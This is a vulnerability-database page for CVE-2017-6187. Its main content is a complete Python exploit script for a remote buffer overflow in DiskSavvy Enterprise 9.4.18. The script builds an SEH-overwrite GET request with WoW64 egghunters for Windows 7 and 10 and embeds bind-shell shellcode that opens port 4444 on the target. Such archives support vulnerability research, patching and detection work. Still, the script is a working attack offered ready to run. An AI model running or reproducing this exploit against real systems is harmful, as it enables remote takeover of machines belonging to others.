Vulners
Lucene search
Disk Savvy Enterprise 9.4.18 Buffer Overflow
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | Disk Savvy Enterprise 9.4.18 - Buffer Overflow (SEH) Exploit | 22 Feb 201700:00 | – | zdt |
 | CVE-2017-6187 | 29 May 201815:50 | – | circl |
 | DiskSavvy Enterprise Buffer Overflow Vulnerability | 23 Feb 201700:00 | – | cnvd |
 | CVE-2017-6187 | 22 Feb 201723:00 | – | cve |
 | CVE-2017-6187 | 22 Feb 201723:00 | – | cvelist |
 | DiskSavvy Enterprise GET Buffer Overflow | 19 Jan 201719:34 | – | metasploit |
 | CVE-2017-6187 | 22 Feb 201723:59 | – | nvd |
 | Disk Savvy Enterprise Server <= 9.4.18 Buffer Overflow Vulnerability | 2 Dec 201600:00 | – | openvas |
 | Buffer overflow | 22 Feb 201723:59 | – | prion |
 | Disk Savvy Enterprise long URI in GET request buffer overflow | 16 Mar 201700:00 | – | saint |
10
`# Exploit Title: DiskSavvy Enterprise 9.4.18 - Remote buffer overflow - SEH overwrite with WoW64 egghunters
# Date: 2017-02-22
# Exploit Author: Peter Baris
# Vendor Homepage: www.saptech-erp.com.au
# Software Link: http://www.disksavvy.com/downloads.html
# Version: 9.4.18
# Tested on: Windows 7 Pro SP1 x64 (fully patched) and Windows 10 Pro x64
# WoW64 egghunters are in use in this exploit, meaning it will work on specific 64bit operating systems
# Original Win7 egghunter: https://www.corelan.be/index.php/2011/11/18/wow64-egghunter/ - but I modified it for this exploit
# Win10 WoW64 egghunter only supports x86_64 platform - developed by Peter Baris based on corelan's Win7 version
# If you require a WoW64 egghunter for additional windows versions, contact me through my website http://saptech-erp.com.au/services.php
import socket
import sys
try:
host = sys.argv[1]
os = sys.argv[2]
port = 80
except IndexError:
print "[+] Usage %s <host> win7/win10" % sys.argv[0]
print "[i] Example: dsavvy.py localhost win10"
sys.exit()
# 355 bytes bind shell, PORT 4444, bad chars \x09\x0a\x0d\x20
shell = ("\xba\x6c\xb1\x12\x02\xd9\xc7\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x83\xee\xfc\x31\x56\x0e\x03\x3a\xbf\xf0\xf7\x3e\x57\x76"
"\xf7\xbe\xa8\x17\x71\x5b\x99\x17\xe5\x28\x8a\xa7\x6d\x7c\x27"
"\x43\x23\x94\xbc\x21\xec\x9b\x75\x8f\xca\x92\x86\xbc\x2f\xb5"
"\x04\xbf\x63\x15\x34\x70\x76\x54\x71\x6d\x7b\x04\x2a\xf9\x2e"
"\xb8\x5f\xb7\xf2\x33\x13\x59\x73\xa0\xe4\x58\x52\x77\x7e\x03"
"\x74\x76\x53\x3f\x3d\x60\xb0\x7a\xf7\x1b\x02\xf0\x06\xcd\x5a"
"\xf9\xa5\x30\x53\x08\xb7\x75\x54\xf3\xc2\x8f\xa6\x8e\xd4\x54"
"\xd4\x54\x50\x4e\x7e\x1e\xc2\xaa\x7e\xf3\x95\x39\x8c\xb8\xd2"
"\x65\x91\x3f\x36\x1e\xad\xb4\xb9\xf0\x27\x8e\x9d\xd4\x6c\x54"
"\xbf\x4d\xc9\x3b\xc0\x8d\xb2\xe4\x64\xc6\x5f\xf0\x14\x85\x37"
"\x35\x15\x35\xc8\x51\x2e\x46\xfa\xfe\x84\xc0\xb6\x77\x03\x17"
"\xb8\xad\xf3\x87\x47\x4e\x04\x8e\x83\x1a\x54\xb8\x22\x23\x3f"
"\x38\xca\xf6\xaa\x30\x6d\xa9\xc8\xbd\xcd\x19\x4d\x6d\xa6\x73"
"\x42\x52\xd6\x7b\x88\xfb\x7f\x86\x33\x12\xdc\x0f\xd5\x7e\xcc"
"\x59\x4d\x16\x2e\xbe\x46\x81\x51\x94\xfe\x25\x19\xfe\x39\x4a"
"\x9a\xd4\x6d\xdc\x11\x3b\xaa\xfd\x25\x16\x9a\x6a\xb1\xec\x4b"
"\xd9\x23\xf0\x41\x89\xc0\x63\x0e\x49\x8e\x9f\x99\x1e\xc7\x6e"
"\xd0\xca\xf5\xc9\x4a\xe8\x07\x8f\xb5\xa8\xd3\x6c\x3b\x31\x91"
"\xc9\x1f\x21\x6f\xd1\x1b\x15\x3f\x84\xf5\xc3\xf9\x7e\xb4\xbd"
"\x53\x2c\x1e\x29\x25\x1e\xa1\x2f\x2a\x4b\x57\xcf\x9b\x22\x2e"
"\xf0\x14\xa3\xa6\x89\x48\x53\x48\x40\xc9\x63\x03\xc8\x78\xec"
"\xca\x99\x38\x71\xed\x74\x7e\x8c\x6e\x7c\xff\x6b\x6e\xf5\xfa"
"\x30\x28\xe6\x76\x28\xdd\x08\x24\x49\xf4")
crash = "\x41" * 2487
retn = "\x38\x2e\x14\x10" # 0x10142e38 pop edi pop esi ret
filler = "\x44" * (2505-334-300-100)
nseh = "\xeb\x08\x90\x90"
stack_fill="\x41"*100
nops="\x90"*8
egg = "t00wt00w"
if os == "win7":
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x33\xd2"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xef\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
elif os == "win10":
wow64_egghunter = ("\x66\x8c\xcb\x80\xfb\x23\x75\x10\x31\xd2\x66\x81\xca\xff\x0f\x31"
"\xdb\x42\x52\x53\x53\x53\xb3\xc0\x80\xfb\xc0\x74\x13\x3c\x05\x74\xee\xb8"
"\x74\x30\x30\x77"
"\x89\xd7\xaf\x75\xe4\xaf\x75\xe1\xff\xe7"
"\x6a\x29\x58\x64\xff\x13\x83\xc4\x0c\x5a\xeb\xe1")
else:
print "[!] This windows version is not supported yet"
exit(0)
exploit = crash + nseh + retn + nops + wow64_egghunter + stack_fill + egg + nops + shell + filler
buffer = "GET /"+exploit+" HTTP/1.1\r\n"
buffer+= "Host: "+host+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://"+host+"/login\r\n"
buffer+="Connection: keep-alive\r\n"
buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
buffer+="Content-Length: 5900\r\n\r\n"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Feb 2017 00:00Current
0.9Low risk
Vulners AI Score0.9
EPSS0.69378